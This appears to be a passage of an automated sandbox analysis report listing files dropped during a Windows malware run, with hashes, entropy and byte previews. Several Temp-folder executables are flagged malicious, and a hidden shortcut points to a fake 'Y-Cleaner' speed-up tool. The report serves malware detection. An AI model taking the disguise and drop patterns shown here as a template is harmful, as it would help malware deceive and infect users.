                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):314212352
                                                                                                                                                                                                                                                            Entropy (8bit):0.0023433355608441695
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:TWE9OaBxc0AJF8JAfPrYU3HcW534/lVBilM7xbAOxuz/kQ:RxBxcEJAfPrYSHcW6/CMBuz7
                                                                                                                                                                                                                                                            MD5:E75B589095E8C80BCD6D4763CC7676B1
                                                                                                                                                                                                                                                            SHA1:3F1AF3C7F57EB1E68A00767349334DD76F8E5C18
                                                                                                                                                                                                                                                            SHA-256:29224AC6B7960CD61E9A6FF62B20FF169EE36D9937FF1432D9469C6FD70DD163
                                                                                                                                                                                                                                                            SHA-512:DC3FCE724D3D22E24B3566C555792FDE8618B5A25499A8EAFABFEA126DFBD1B99583BAE201CB8F45F0D034C10BD0E68B7F3CE830A27FC0F61930058529105ACF
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.cg...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):9862
                                                                                                                                                                                                                                                            Entropy (8bit):5.5294981214721135
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:824B654832E313787953C52941C09765
                                                                                                                                                                                                                                                            SHA1:74814560FF5E244BC3B6ACA16313AE53553BCD50
                                                                                                                                                                                                                                                            SHA-256:1F7839E332B88E9F24361636F0C0AA5E52DDB8B04A8C5E21710F3796EE847EA7
                                                                                                                                                                                                                                                            SHA-512:4F7E39CBC0091CCE85569B1929FFF62F3F2CDB8DD7BCD47C7817671B2EEEB6B90EBE59515070ED726D7EE44A6DCEA6B52F09DF6AAE94AAB925AEB1FBD6527B30
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):9862
                                                                                                                                                                                                                                                            Entropy (8bit):5.5294981214721135
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:824B654832E313787953C52941C09765
                                                                                                                                                                                                                                                            SHA1:74814560FF5E244BC3B6ACA16313AE53553BCD50
                                                                                                                                                                                                                                                            SHA-256:1F7839E332B88E9F24361636F0C0AA5E52DDB8B04A8C5E21710F3796EE847EA7
                                                                                                                                                                                                                                                            SHA-512:4F7E39CBC0091CCE85569B1929FFF62F3F2CDB8DD7BCD47C7817671B2EEEB6B90EBE59515070ED726D7EE44A6DCEA6B52F09DF6AAE94AAB925AEB1FBD6527B30
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):53
                                                                                                                                                                                                                                                            Entropy (8bit):4.136624295551173
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
                                                                                                                                                                                                                                                            SHA1:B43BC4B3EA206A02EF8F63D5BFAD0C96BF2A3B2A
                                                                                                                                                                                                                                                            SHA-256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
                                                                                                                                                                                                                                                            SHA-512:076EE83534F42563046D25086166F82E1A3EC61840C113AEC67ABE2D8195DAA247D827D0C54E7E8F8A1BBF2D082A3763577587E84342EC160FF97905243E6D19
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:{"profile-after-change":true,"final-ui-startup":true}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):53
                                                                                                                                                                                                                                                            Entropy (8bit):4.136624295551173
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
                                                                                                                                                                                                                                                            SHA1:B43BC4B3EA206A02EF8F63D5BFAD0C96BF2A3B2A
                                                                                                                                                                                                                                                            SHA-256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
                                                                                                                                                                                                                                                            SHA-512:076EE83534F42563046D25086166F82E1A3EC61840C113AEC67ABE2D8195DAA247D827D0C54E7E8F8A1BBF2D082A3763577587E84342EC160FF97905243E6D19
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:{"profile-after-change":true,"final-ui-startup":true}
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Sat Dec 21 20:18:17 2024, mtime=Sat Dec 21 20:18:17 2024, atime=Sat Dec 21 20:18:17 2024, length=1502720, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2219
                                                                                                                                                                                                                                                            Entropy (8bit):3.901029895449564
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:D80D592B9E5E96B0A4A15A16D4274822
                                                                                                                                                                                                                                                            SHA1:EC0F7ABA3DF33C0345A8398C97A455AB0500D295
                                                                                                                                                                                                                                                            SHA-256:97104C7C36644E980C5D22EEDA29FEDB7AF02D472BE7C8AA641DC5578355B7F7
                                                                                                                                                                                                                                                            SHA-512:21770AF914ED327808C762547B86D321A2100A8B449F1A0822FF9F286126B1750E2BC660D4C79DF121EEA34BEF21F2199431E4043376D72246879FBCE4483D10
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:L..................F.@.. ....Aj..S...Aj..S...Aj..S..........................B.:..DG..Yr?.D..U..k0.&...&......vk.v.......^.S..0@...S......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y............................%..A.p.p.D.a.t.a...B.P.1......Y3...Local.<......CW.^.Y4.....b.....................*KP.L.o.c.a.l.....N.1......YE...Temp..:......CW.^.YH.....l.....................&_..T.e.m.p.....~.1......YC...AE01FD~1..f......YC..YC.............................A.e.0.1.f.d.z.V.5.f.5.3.f.f.e.f.S.w.3.B.E.v.K.V.e.V.....h.2......YI. .Y-CLEA~1.EXE..L......YI..YI...........................U.V.Y.-.C.l.e.a.n.e.r...e.x.e.......y...............-.......x...........3........C:\Users\user\AppData\Local\Temp\Ae01fdzV5f53ffefSw3BEvKVeV\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.>.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.A.e.0.1.f.d.z.V.5.f.5.3.f.f.e.f.S.w.3.B.E.v.K.V.e.V.\.Y.-.C.l.e.a.n.e.r...e.x.e.J.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3272704
                                                                                                                                                                                                                                                            Entropy (8bit):6.634808752309927
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:AEFBD9E285960B704524B4C33B0C9567
                                                                                                                                                                                                                                                            SHA1:688EB719525B89F93DB7D22BCBAE38A13E7A973B
                                                                                                                                                                                                                                                            SHA-256:BC240F565F4A4AAB03CDF04B6AE4522179347145E338EF33DF918E741AFC5EBB
                                                                                                                                                                                                                                                            SHA-512:9186CA00F1451B750F59BC999E696964866639A06018E4AD241DD5DDF85550FFDD370D91E72F45A04644F555C150021383E16B29F7C0C27CB8B7CF9465E0AD8F
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@.......................... 2.......2...@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...scoprlns.0+......0+.................@...mrzrmbbr......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):284
                                                                                                                                                                                                                                                            Entropy (8bit):3.4083010344720677
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:A7965DEEADD950AA50040C2D60761CEC
                                                                                                                                                                                                                                                            SHA1:82F890DE9BA1EF4BC20A2FD596B30B268801639A
                                                                                                                                                                                                                                                            SHA-256:FA03F97879C8FE8EA965993A9C8FA9E8889F6EF3BCF1F6C595C6ED2F3CAC6181
                                                                                                                                                                                                                                                            SHA-512:B5C11D2380427CB5E364F21CC292ED2CB240F0E4B00A40CFA2A97E0BD6BE0A8FD3AEC3A6B0BB54B317966D3676E552925DCBE8AF7B10E5DF52CC55273DB9581F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:....?Z.BAE..._.t..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):147968
                                                                                                                                                                                                                                                            Entropy (8bit):6.454649285943866
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:CC36E2A5A3C64941A79C31CA320E9797
                                                                                                                                                                                                                                                            SHA1:50C8F5DB809CFEC84735C9F4DCD6B55D53DFD9F5
                                                                                                                                                                                                                                                            SHA-256:6FEC179C363190199C1DCDF822BE4D6B1F5C4895EBC7148A8FC9FA9512EEADE8
                                                                                                                                                                                                                                                            SHA-512:FCEA6D62DC047E40182DC4FF1E0522CA935F9AEEFDB1517957977BC5D9AC654285A973261401F3B98ABF1F6ED62638B9E31306FD7AAEB67214CA42DFC2888AF0
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ag.....................`....................@...........................#.............................................(................................p#.........................................\............................................text...x........................... ....rdata...1.......2..................@..@.data....!!..0......................@....00cfg.......`#......*..............@..@.reloc.......p#......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1058336
                                                                                                                                                                                                                                                            Entropy (8bit):6.827880169201504
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:971B0519B1C0461DB6700610E5E9CA8E
                                                                                                                                                                                                                                                            SHA1:9A262218310F976AAF837E54B4842E53E73BE088
                                                                                                                                                                                                                                                            SHA-256:47CF75570C1ECA775B2DD1823233D7C40924D3A8D93E0E78C943219CF391D023
                                                                                                                                                                                                                                                            SHA-512:D234A9C5A1DA8415CD4D2626797197039F2537E98F8F43D155F815A7867876CBC1BF466BE58677C79A9199EA47D146A174998D21EF0AEBC29A4B0443F8857CB9
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w.m..........."...0......(........... ........@.. ....................... ............`.................................K...O....... %.............. r..........p...T............................................ ............... ..H............text........ ...................... ..`.rsrc... %.......&..................@..@.reloc..............................@..B........................H........7................................................................{8...*..{9...*..{:...*..{;...*..{<...*..{=...*..{>...*..{?...*..{@...*..{A...*..{B...*.0..\........(C.....}8.....}9.....}:......};......}<......}=......}>......}?......}@......}A......}B...*.0...........u.......;.....9....(D....{8....{8...oE...9....(F....{9....{9...oG...9....(H....{:....{:...oI...9....(J....{;....{;...oK...9....(L....{<....{<...oM...9....(N....{=....{=...oO...,w(P....{>....{>...oQ...,_(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (843)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                                                                                                            Entropy (8bit):5.211681667386906
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:3384D0D6A17534935600E628FF732BEC
                                                                                                                                                                                                                                                            SHA1:7830E8243FCEB0EE5D272F5D5BC2581BFA187941
                                                                                                                                                                                                                                                            SHA-256:403254EE21C034272FE9AC16B6ACD975C7695690E53E703BE031FF3FAE5965E4
                                                                                                                                                                                                                                                            SHA-512:AF8FCF2C029EB04CFC63655608655D6A3B2EE6C70E56FB933052CDB7D53CA98EA5B21DCB7596725DE95ECF128E86D398F0CF475B8E3592708E948739422D355D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                            Preview:)]}'.["",["final jeopardy question","how the bengals can make the playoffs","mcdonald\u0027s menu 2025","military helicopter crash camp pendleton","genshin impact 5.3 livestream codes","wordle answer december 21","arctic cat snowmobiles","ny rangers trade"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-5291697413243839848,"google:suggestrelevance":[1254,1253,1252,1251,1250,702,701,700],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                                                                            Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                            SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                            SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                            SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                            Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):132739
                                                                                                                                                                                                                                                            Entropy (8bit):5.4367666759680455
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:E2DA068705EFCA932744CF432A3866D6
                                                                                                                                                                                                                                                            SHA1:8D0BCAA74634C9DE0C0530E82EBFE7CC6382BCAC
                                                                                                                                                                                                                                                            SHA-256:38B44FD0D732E4BA9E33D49A2D85CA4936B9797916138840482FB10E60534F54
                                                                                                                                                                                                                                                            SHA-512:05049730962C87605D6F02306160EC3CA2E211964F2912BDA9B7246B6F5CB384EEAEEC56898553E4DA347A6230F32699F5495F6AFC97C55318402F02CB8F12E9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                            Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):5162
                                                                                                                                                                                                                                                            Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                            SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                            SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                            SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                            Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1660
                                                                                                                                                                                                                                                            Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                            SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                            SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                            SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
